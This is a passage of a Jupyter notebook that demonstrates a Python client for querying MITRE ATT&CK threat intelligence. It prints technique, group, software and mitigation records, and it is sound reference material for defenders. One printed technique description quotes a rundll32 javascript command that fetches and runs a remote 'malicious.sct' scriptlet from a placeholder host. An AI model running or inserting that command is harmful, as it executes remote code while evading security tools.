{
"cells": [
{
"cell_type": "markdown",
"metadata": {},
"source": [
"# **MITRE ATT&CK API FILTERS**: Python Client\n",
"------------------"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Import ATTACK API Client"
]
},
{
"cell_type": "code",
"execution_count": 1,
"metadata": {},
"outputs": [],
"source": [
"from attackcti import attack_client"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Import Extra Libraries"
]
},
{
"cell_type": "code",
"execution_count": 2,
"metadata": {},
"outputs": [],
"source": [
"from pandas import *\n",
"from pandas.io.json import json_normalize"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Initialize ATT&CK Client Variable"
]
},
{
"cell_type": "code",
"execution_count": 3,
"metadata": {},
"outputs": [],
"source": [
"lift = attack_client()"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Technique by Name (TAXII)\n",
"You can use a custom method in the attack_client class to get a technique across all the matrices by its name. It is case sensitive."
]
},
{
"cell_type": "code",
"execution_count": 4,
"metadata": {},
"outputs": [],
"source": [
"technique_name = lift.get_technique_by_name('Rundll32')"
]
},
{
"cell_type": "code",
"execution_count": 5,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'type': 'attack-pattern',\n",
" 'id': 'attack-pattern--62b8c999-dcc0-4755-bd69-09442d9359f5',\n",
" 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n",
" 'created': '2017-05-31 21:31:06.045000+00:00',\n",
" 'modified': '2018-04-18 17:59:24.739000+00:00',\n",
" 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n",
" 'url': 'https://attack.mitre.org/wiki/Technique/T1085',\n",
" 'matrix': 'mitre-attack',\n",
" 'technique': 'Rundll32',\n",
" 'technique_description': 'The rundll32.exe program can be called to execute an arbitrary binary. Adversaries may take advantage of this functionality to proxy execution of code to avoid triggering security tools that may not monitor execution of the rundll32.exe process because of whitelists or false positives from Windows using rundll32.exe for normal operations.\\n\\nRundll32.exe can be used to execute Control Panel Item files (.cpl) through the undocumented shell32.dll functions Control_RunDLL and Control_RunDLLAsUser. Double-clicking a .cpl file also causes rundll32.exe to execute. (Citation: Trend Micro CPL)\\n\\nRundll32 can also been used to execute scripts such as JavaScript. This can be done using a syntax similar to this: rundll32.exe javascript:\"\\\\..\\\\mshtml,RunHTMLApplication \";document.write();GetObject(\"script:https[:]//www[.]example[.]com/malicious.sct\")\" This behavior has been seen used by malware such as Poweliks. (Citation: This is Security Command Line Confusion)\\n\\nDetection: Use process monitoring to monitor the execution and arguments of rundll32.exe. Compare recent invocations of rundll32.exe with prior history of known good arguments and loaded DLLs to determine anomalous and potentially adversarial activity. Command arguments used with the rundll32.exe invocation may also be useful in determining the origin and purpose of the DLL being loaded.\\n\\nPlatforms: Windows\\n\\nData Sources: File monitoring, Binary file metadata, Process command-line parameters, Process monitoring\\n\\nDefense Bypassed: Anti-virus, Application whitelisting\\n\\nPermissions Required: User\\n\\nRemote Support: No\\n\\nContributors: Ricardo Dias, Casey Smith',\n",
" 'tactic': ['defense-evasion', 'execution'],\n",
" 'technique_id': 'T1085',\n",
" 'platform': ['Windows'],\n",
" 'data_sources': ['File monitoring',\n",
" 'Binary file metadata',\n",
" 'Process command-line parameters',\n",
" 'Process monitoring'],\n",
" 'defense_bypassed': ['Anti-virus', 'Application whitelisting'],\n",
" 'permissions_required': ['User'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': False,\n",
" 'contributors': ['Ricardo Dias', 'Casey Smith'],\n",
" 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1085',\n",
" 'https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf',\n",
" 'https://thisissecurity.stormshield.com/2014/08/20/poweliks-command-line-confusion/'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 5,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"technique_name"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Data Sources from All Techniques (TAXII)\n",
"* You can also get all the data sources available in ATT&CK\n",
"* Currently the only techniques with data sources are the ones in Enterprise ATT&CK."
]
},
{
"cell_type": "code",
"execution_count": 6,
"metadata": {},
"outputs": [],
"source": [
"data_sources = lift.get_all_data_sources()"
]
},
{
"cell_type": "code",
"execution_count": 7,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"48"
]
},
"execution_count": 7,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"len(data_sources)"
]
},
{
"cell_type": "code",
"execution_count": 8,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"['browser extensions',\n",
" 'web application firewall logs',\n",
" 'named pipes',\n",
" 'dns records',\n",
" 'mbr',\n",
" 'detonation chamber',\n",
" 'windows error reporting',\n",
" 'powershell logs',\n",
" 'asset management',\n",
" 'web logs',\n",
" 'ssl/tls inspection',\n",
" 'access tokens',\n",
" 'application logs',\n",
" 'data loss prevention',\n",
" 'windows registry',\n",
" 'network device logs',\n",
" 'binary file metadata',\n",
" 'anti-virus',\n",
" 'vbr',\n",
" 'file monitoring',\n",
" 'services',\n",
" 'web proxy',\n",
" 'digital certificate logs',\n",
" 'bios',\n",
" 'malware reverse engineering',\n",
" 'user interface',\n",
" 'system calls',\n",
" 'host network interface',\n",
" 'efi',\n",
" 'windows event logs',\n",
" 'api monitoring',\n",
" 'network intrusion detection system',\n",
" 'dll monitoring',\n",
" 'environment variable',\n",
" 'packet capture',\n",
" 'mail server',\n",
" 'wmi objects',\n",
" 'netflow/enclave netflow',\n",
" 'sensor health and status',\n",
" 'process monitoring',\n",
" 'network protocol analysis',\n",
" 'kernel drivers',\n",
" 'process use of network',\n",
" 'loaded dlls',\n",
" 'third-party application logs',\n",
" 'authentication logs',\n",
" 'email gateway',\n",
" 'process command-line parameters']"
]
},
"execution_count": 8,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"data_sources"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Any STIX Object by ID (TAXII)\n",
"* You can get any STIX object by its id across all the matrices. It is case sensitive.\n",
"* You can use the following STIX Object Types:\n",
" * attack-pattern > techniques\n",
" * course-of-action > mitigations\n",
" * intrusion-set > groups\n",
" * malware\n",
" * tool"
]
},
{
"cell_type": "code",
"execution_count": 9,
"metadata": {},
"outputs": [],
"source": [
"object_by_id = lift.get_object_by_attack_id('attack-pattern', 'PRE-T1054')"
]
},
{
"cell_type": "code",
"execution_count": 10,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'type': 'attack-pattern',\n",
" 'id': 'attack-pattern--028ad431-84c5-4eb7-a364-2b797c234f88',\n",
" 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n",
" 'created': '2017-12-14 16:46:06.044000+00:00',\n",
" 'modified': '2018-04-18 17:59:24.739000+00:00',\n",
" 'object_marking_refs': ['marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168'],\n",
" 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054',\n",
" 'matrix': 'mitre-pre-attack',\n",
" 'technique': 'Acquire OSINT data sets and information',\n",
" 'technique_description': 'Data sets can be anything from Security Exchange Commission (SEC) filings to public phone numbers. Many datasets are now either publicly available for free or can be purchased from a variety of data vendors. Open source intelligence (OSINT) is intelligence gathered from publicly available sources. This can include both information gathered on-line as well as in the physical world. (Citation: SANSThreatProfile) (Citation: Infosec-osint) (Citation: isight-osint)\\n\\nDetectable by Common Defenses: No\\n\\nDetectable by Common Defenses explanation: This activity is indistinguishable from legitimate business uses and easy to obtain.\\n\\nDifficulty for the Adversary: Yes\\n\\nDifficulty for the Adversary explanation: Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.',\n",
" 'tactic': ['organizational-information-gathering'],\n",
" 'technique_id': 'PRE-T1054',\n",
" 'platform': None,\n",
" 'data_sources': None,\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': None,\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': None,\n",
" 'technique_references': ['https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1054',\n",
" 'SANSThreatProfile',\n",
" 'Infosec-osint',\n",
" 'isight-osint'],\n",
" 'detectable_by_common_defenses': 'No',\n",
" 'detectable_explanation': 'This activity is indistinguishable from legitimate business uses and easy to obtain.',\n",
" 'difficulty_for_adversary': 'Yes',\n",
" 'difficulty_explanation': 'Large quantities of data exists on people, organizations and technologies whether divulged wittingly or collected as part of doing business on the Internet (unbeknownst to the user/company). Search engine and database indexing companies continuously mine this information and make it available to anyone who queries for it.',\n",
" 'tactic_type': None}"
]
},
"execution_count": 10,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"object_by_id"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Any Group by Alias (TAXII)\n",
"You can get any Group by its Alias property across all the matrices. It is case sensitive."
]
},
{
"cell_type": "code",
"execution_count": 11,
"metadata": {},
"outputs": [],
"source": [
"group_name = lift.get_group_by_alias('Cozy Bear')"
]
},
{
"cell_type": "code",
"execution_count": 12,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'type': 'intrusion-set',\n",
" 'id': 'intrusion-set--899ce53f-13a0-479b-a0e4-67d46e241542',\n",
" 'created_by_ref': 'identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5',\n",
" 'matrix': 'mitre-attack',\n",
" 'created': '2017-05-31 21:31:52.748000+00:00',\n",
" 'modified': '2018-04-18 17:59:24.739000+00:00',\n",
" 'url': 'https://attack.mitre.org/wiki/Group/G0016',\n",
" 'group': 'APT29',\n",
" 'group_description': 'APT29 is threat group that has been attributed to the Russian government and has operated since at least 2008. (Citation: F-Secure The Dukes) (Citation: GRIZZLY STEPPE JAR) This group reportedly compromised the Democratic National Committee starting in the summer of 2015. (Citation: Crowdstrike DNC June 2016)',\n",
" 'group_aliases': ['APT29', 'The Dukes', 'Cozy Bear', 'CozyDuke'],\n",
" 'group_id': 'G0016',\n",
" 'group_references': ['https://attack.mitre.org/wiki/Group/G0016',\n",
" 'https://www.f-secure.com/documents/996508/1030745/dukes%20whitepaper.pdf',\n",
" 'GRIZZLY STEPPE JAR',\n",
" 'https://www.crowdstrike.com/blog/bears-midst-intrusion-democratic-national-committee/']}"
]
},
"execution_count": 12,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"group_name"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Relationships by Any Object (TAXII)\n",
"* You can get specific relationships defined in ATT&CK for specific ogjects across all the matrices.\n",
"* The valid options are: **groups**, **software** and **mitigations**\n",
"* This function collects all the relationships available in ATT&CK via the **get_all_relationships()** function. Then, depending on the specific stix object requested, the information is filtered.\n",
"* The function enriches the ouput of the **get_all_relationships()** one by adding more context to the **source object** defined in the **Relationships stix object**.\n",
"* You get more information about the source and also keep the **target source** object id to then map the results to the target stix object."
]
},
{
"cell_type": "code",
"execution_count": 13,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'target_object': 'attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e',\n",
" 'relationship_description': 'Cobalt Strike uses a custom command and control protocol that communicates over commonly used ports. The C2 protocol is encapsulated in common application layer protocols.',\n",
" 'software_type': 'tool',\n",
" 'matrix': 'mitre-attack',\n",
" 'software': 'Cobalt Strike',\n",
" 'software_description': 'Cobalt Strike is a commercial, full-featured, penetration testing tool which bills itself as “adversary simulation software designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors”. Cobalt Strike’s interactive post-exploit capabilities cover the full range of ATT&CK tactics, all executed within a single, integrated system. (Citation: cobaltstrike manual)\\n\\nIn addition to its own capabilities, Cobalt Strike leverages the capabilities of other well-known tools such as Metasploit and Mimikatz. (Citation: cobaltstrike manual)\\n\\nAliases: Cobalt Strike\\n\\nContributors: Josh Abraham',\n",
" 'software_labels': ['tool'],\n",
" 'software_id': 'S0154',\n",
" 'url': 'https://attack.mitre.org/wiki/Software/S0154',\n",
" 'software_aliases': ['Cobalt Strike'],\n",
" 'software_references': ['https://attack.mitre.org/wiki/Software/S0154',\n",
" 'https://cobaltstrike.com/downloads/csmanual38.pdf']}"
]
},
"execution_count": 13,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"relationships = lift.get_relationships_by_object('software')\n",
"relationships[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get All Techniques with Mitigations (TAXII)\n",
"The difference with this function and **get_all_techniques()** is that **get_all_techniques_with_mitigations** returns (of course haha) mitigations mapped to their respective techniques. This is useful for when you want to gather mitigations and techniques all at once."
]
},
{
"cell_type": "code",
"execution_count": 14,
"metadata": {},
"outputs": [],
"source": [
"complete_techniques = lift.get_all_techniques_with_mitigations()"
]
},
{
"cell_type": "code",
"execution_count": 15,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'mitigation': '.bash_profile and .bashrc Mitigation',\n",
" 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.',\n",
" 'mitigation_id': 'T1156',\n",
" 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'],\n",
" 'technique': '.bash_profile and .bashrc',\n",
" 'technique_description': \"~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed.\\n\\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\\n\\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\\n\\nDetection: While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\\n\\nPlatforms: Linux, macOS\\n\\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\\n\\nPermissions Required: User, Administrator\",\n",
" 'tactic': ['persistence'],\n",
" 'url': 'https://attack.mitre.org/wiki/Technique/T1156',\n",
" 'technique_id': 'T1156',\n",
" 'platform': ['Linux', 'macOS'],\n",
" 'data_sources': ['File monitoring',\n",
" 'Process Monitoring',\n",
" 'Process command-line parameters',\n",
" 'Process use of network'],\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': ['User', 'Administrator'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': None,\n",
" 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156',\n",
" 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 15,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"complete_techniques[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Techniques Used by Software (TAXII)\n",
"If you do not provide the name of a specific **Software** (Case Sensitive), the function returns information about every piece of software across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 16,
"metadata": {},
"outputs": [],
"source": [
"software_techniques = lift.get_techniques_used_by_software('BITSAdmin')"
]
},
{
"cell_type": "code",
"execution_count": 17,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_description': 'can be used to create BITS Jobs to upload and/or download files.',\n",
" 'software': 'BITSAdmin',\n",
" 'software_description': 'is a command line tool used to create and manage BITS Jobs. (Citation: Microsoft BITSAdmin)\\n\\nAliases: BITSAdmin',\n",
" 'software_labels': ['tool'],\n",
" 'software_id': 'S0190',\n",
" 'software_aliases': ['BITSAdmin'],\n",
" 'software_references': ['https://attack.mitre.org/wiki/Software/S0190',\n",
" 'https://msdn.microsoft.com/library/aa362813.aspx'],\n",
" 'technique': 'Remote File Copy',\n",
" 'technique_description': 'Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Files may be copied from an external adversary-controlled system through the Command and Control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.\\n\\nAdversaries may also copy files laterally between internal victim systems to support Lateral Movement with remote Execution using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with Windows Admin Shares or Remote Desktop Protocol.\\n\\nDetection: Monitor for file creation and files transferred within a network over SMB. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.\\n\\nAnalyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\\n\\nPlatforms: Linux, macOS, Windows\\n\\nData Sources: File monitoring, Packet capture, Process use of network, Netflow/Enclave netflow, Network protocol analysis, Process monitoring\\n\\nPermissions Required: User\\n\\nRequires Network: Yes',\n",
" 'tactic': ['command-and-control', 'lateral-movement'],\n",
" 'technique_id': 'T1105',\n",
" 'url': 'https://attack.mitre.org/wiki/Technique/T1105'}"
]
},
"execution_count": 17,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"software_techniques[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Techniques Used by Group (TAXII)\n",
"If you do not provide the name of a specific **Group** (Case Sensitive), the function returns information about all the groups available across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 18,
"metadata": {},
"outputs": [],
"source": [
"group_techniques = lift.get_techniques_used_by_group('APT12')"
]
},
{
"cell_type": "code",
"execution_count": 19,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-pre-attack',\n",
" 'relationship_description': None,\n",
" 'group': 'APT12',\n",
" 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n",
" 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n",
" 'group_id': 'G0005',\n",
" 'group_references': ['https://attack.mitre.org/wiki/Group/G0005',\n",
" 'http://www.crowdstrike.com/blog/whois-numbered-panda/'],\n",
" 'technique': 'Determine strategic target',\n",
" 'technique_description': 'An adversary undergoes an iterative target selection process that may begin either broadly and narrow down into specifics (strategic to tactical) or narrowly and expand outward (tactical to strategic). As part of this process, an adversary may determine a high level target they wish to attack. One example of this may be a particular country, government, or commercial sector. (Citation: CyberAdversaryBehavior) (Citation: JP3-60) (Citation: JP3-12 (R)) (Citation: DoD Cyber 2015)\\n\\nDetectable by Common Defenses: No\\n\\nDetectable by Common Defenses explanation: Normally, defender is unable to detect. May change for special use cases or adversary and defender overlays.\\n\\nDifficulty for the Adversary: Yes\\n\\nDifficulty for the Adversary explanation: This is the normal adversary targeting cycle where they utilize our poor OPSEC practices to their advantage.',\n",
" 'tactic': ['target-selection'],\n",
" 'technique_id': 'PRE-T1018',\n",
" 'url': 'https://attack.mitre.org/pre-attack/index.php/Technique/PRE-T1018'}"
]
},
"execution_count": 19,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"group_techniques[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Software Used by Group (TAXII)\n",
"If you do not provide the name of a specific Group, it returns information about all the groups available across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 20,
"metadata": {},
"outputs": [],
"source": [
"group_software = lift.get_software_used_by_group('APT12')"
]
},
{
"cell_type": "code",
"execution_count": 21,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_description': None,\n",
" 'group': 'APT12',\n",
" 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n",
" 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n",
" 'group_id': 'G0005',\n",
" 'group_references': ['https://attack.mitre.org/wiki/Group/G0005',\n",
" 'http://www.crowdstrike.com/blog/whois-numbered-panda/'],\n",
" 'software url': 'https://attack.mitre.org/wiki/Software/S0015',\n",
" 'software': 'Ixeshe',\n",
" 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)\\n\\nAliases: Ixeshe',\n",
" 'software_labels': ['malware'],\n",
" 'software_id': 'S0015',\n",
" 'software_aliases': ['Ixeshe'],\n",
" 'software_references': ['https://attack.mitre.org/wiki/Software/S0015',\n",
" 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n",
" 'technique': 'Data Obfuscation',\n",
" 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\\n\\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\\n\\nPlatforms: Linux, macOS, Windows\\n\\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\\n\\nRequires Network: Yes',\n",
" 'tactic': ['command-and-control'],\n",
" 'technique_id': 'T1001'}"
]
},
"execution_count": 21,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"group_software[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get Everything Used by Group (TAXII)\n",
"* This function does not provide techniques defined for each Software that was used by group.\n",
"* The information returned covers techniques that were used by a group and the name and description of software.\n",
"* If you do not provide the name of a specific **Group**, it returns information about all the groups available across all the matrices."
]
},
{
"cell_type": "code",
"execution_count": 22,
"metadata": {},
"outputs": [],
"source": [
"all_used_by_group = lift.get_all_used_by_group('APT12')"
]
},
{
"cell_type": "code",
"execution_count": 23,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'relationship_description': None,\n",
" 'group': 'APT12',\n",
" 'group_description': 'APT12 is a threat group that has been attributed to China. (Citation: Meyers Numbered Panda)',\n",
" 'group_aliases': ['APT12', 'IXESHE', 'DynCalc', 'Numbered Panda', 'DNSCALC'],\n",
" 'group_id': 'G0005',\n",
" 'group_references': ['https://attack.mitre.org/wiki/Group/G0005',\n",
" 'http://www.crowdstrike.com/blog/whois-numbered-panda/'],\n",
" 'software url': 'https://attack.mitre.org/wiki/Software/S0015',\n",
" 'software': 'Ixeshe',\n",
" 'software_description': 'Ixeshe is a malware family that has been used since 2009 to attack targets in East Asia. (Citation: Moran 2013)\\n\\nAliases: Ixeshe',\n",
" 'software_labels': ['malware'],\n",
" 'software_id': 'S0015',\n",
" 'software_aliases': ['Ixeshe'],\n",
" 'software_references': ['https://attack.mitre.org/wiki/Software/S0015',\n",
" 'https://www.fireeye.com/blog/threat-research/2013/08/survival-of-the-fittest-new-york-times-attackers-evolve-quickly.html'],\n",
" 'technique': 'Data Obfuscation',\n",
" 'technique_description': 'Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, commingling legitimate traffic with C2 communications traffic, or using a non-standard data encoding system, such as a modified Base64 encoding for the message body of an HTTP request.\\n\\nDetection: Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)\\n\\nPlatforms: Linux, macOS, Windows\\n\\nData Sources: Packet capture, Process use of network, Process monitoring, Network protocol analysis\\n\\nRequires Network: Yes',\n",
" 'tactic': ['command-and-control'],\n",
" 'technique_id': 'T1001'}"
]
},
"execution_count": 23,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"all_used_by_group[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"## Get All ATT&CK (TAXII)\n",
"* This function collects everything from the ATT&CK framework and presents it as a long list of dictionaries making it easy to display the results as a table unlike the **get_all_stix_objects()** function that returns a dictionary.\n",
"* It collects all the information from the following functions:\n",
" * **get_all_techniques_with_mitigations()**\n",
" * **get_all_software()**\n",
" * **get_techniques_used_by_software()**\n",
" * **get_all_groups()**\n",
" * **get_all_used_by_group()**"
]
},
{
"cell_type": "code",
"execution_count": 24,
"metadata": {},
"outputs": [
{
"name": "stdout",
"output_type": "stream",
"text": [
"CPU times: user 13.9 s, sys: 280 ms, total: 14.2 s\n",
"Wall time: 41.3 s\n"
]
}
],
"source": [
"%time all_attack_framework = lift.get_all_attack()"
]
},
{
"cell_type": "code",
"execution_count": 25,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"list"
]
},
"execution_count": 25,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"type(all_attack_framework)"
]
},
{
"cell_type": "code",
"execution_count": 26,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"{'matrix': 'mitre-attack',\n",
" 'mitigation': '.bash_profile and .bashrc Mitigation',\n",
" 'mitigation_description': 'Making these files immutable and only changeable by certain administrators will limit the ability for adversaries to easily create user level persistence.',\n",
" 'mitigation_id': 'T1156',\n",
" 'mitigation_references': ['https://attack.mitre.org/wiki/Technique/T1156'],\n",
" 'technique': '.bash_profile and .bashrc',\n",
" 'technique_description': \"~/.bash_profile and ~/.bashrc are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly. ~/.bash_profile is executed for login shells and ~/.bashrc is executed for interactive non-login shells. This means that when a user logs in (via username and password) to the console (either locally or remotely via something like SSH), ~/.bash_profile is executed before the initial command prompt is returned to the user. After that, every time a new shell is opened, ~/.bashrc is executed. This allows users more fine grained control over when they want certain commands executed.\\n\\nMac's Terminal.app is a little different in that it runs a login shell by default each time a new terminal window is opened, thus calling ~/.bash_profile each time instead of ~/.bashrc.\\n\\nThese files are meant to be written to by the local user to configure their own environment; however, adversaries can also insert code into these files to gain persistence each time a user logs in or opens a new shell (Citation: amnesia malware).\\n\\nDetection: While users may customize their ~/.bashrc and ~/.bash_profile files , there are only certain types of commands that typically appear in these files. Monitor for abnormal commands such as execution of unknown programs, opening network sockets, or reaching out across the network when user profiles are loaded during the login process.\\n\\nPlatforms: Linux, macOS\\n\\nData Sources: File monitoring, Process Monitoring, Process command-line parameters, Process use of network\\n\\nPermissions Required: User, Administrator\",\n",
" 'tactic': ['persistence'],\n",
" 'url': 'https://attack.mitre.org/wiki/Technique/T1156',\n",
" 'technique_id': 'T1156',\n",
" 'platform': ['Linux', 'macOS'],\n",
" 'data_sources': ['File monitoring',\n",
" 'Process Monitoring',\n",
" 'Process command-line parameters',\n",
" 'Process use of network'],\n",
" 'defense_bypassed': None,\n",
" 'permissions_required': ['User', 'Administrator'],\n",
" 'effective_permissions': None,\n",
" 'system_requirements': None,\n",
" 'network_requirements': None,\n",
" 'remote_support': None,\n",
" 'contributors': None,\n",
" 'technique_references': ['https://attack.mitre.org/wiki/Technique/T1156',\n",
" 'https://researchcenter.paloaltonetworks.com/2017/04/unit42-new-iotlinux-malware-targets-dvrs-forms-botnet/'],\n",
" 'detectable_by_common_defenses': None,\n",
" 'detectable_explanation': None,\n",
" 'difficulty_for_adversary': None,\n",
" 'difficulty_explanation': None,\n",
" 'tactic_type': None}"
]
},
"execution_count": 26,
"metadata": {},
"output_type": "execute_result"
}
],
"source": [
"all_attack_framework[0]"
]
},
{
"cell_type": "markdown",
"metadata": {},
"source": [
"Showing schema of the results"
]
},
{
"cell_type": "code",
"execution_count": 27,
"metadata": {},
"outputs": [],
"source": [
"df = json_normalize(all_attack_framework)"
]
},
{
"cell_type": "code",
"execution_count": 28,
"metadata": {},
"outputs": [
{
"data": {
"text/plain": [
"['contributors',\n",
" 'data_sources',\n",
" 'defense_bypassed',\n",
" 'detectable_by_common_defenses',\n",
" 'detectable_explanation',\n",
" 'difficulty_explanation',\n",
" 'difficulty_for_adversary',\n",
" 'effective_permissions',\n",
" 'group',\n",
" 'group_aliases',\n",
" 'group_description',\n",
" 'group_id',\n",
" 'group_references',\n",
" 'matrix',\n",
" 'mitigation',\n",
" 'mitigation_description',\n",
" 'mitigation_id',\n",
" 'mitigation_references',\n",
" 'network_requirements',\n",
" 'permissions_required',\n",
" 'platform',\n",
" 'relationship_description',\n",
" 'remote_support',\n",
" 'software',\n",
" 'software url',\n",
" 'software_aliases',\n",
" 'software_description',\n",
" 'software_id',\n",
" 'software_labels',\n",
" 'software_references',\n",
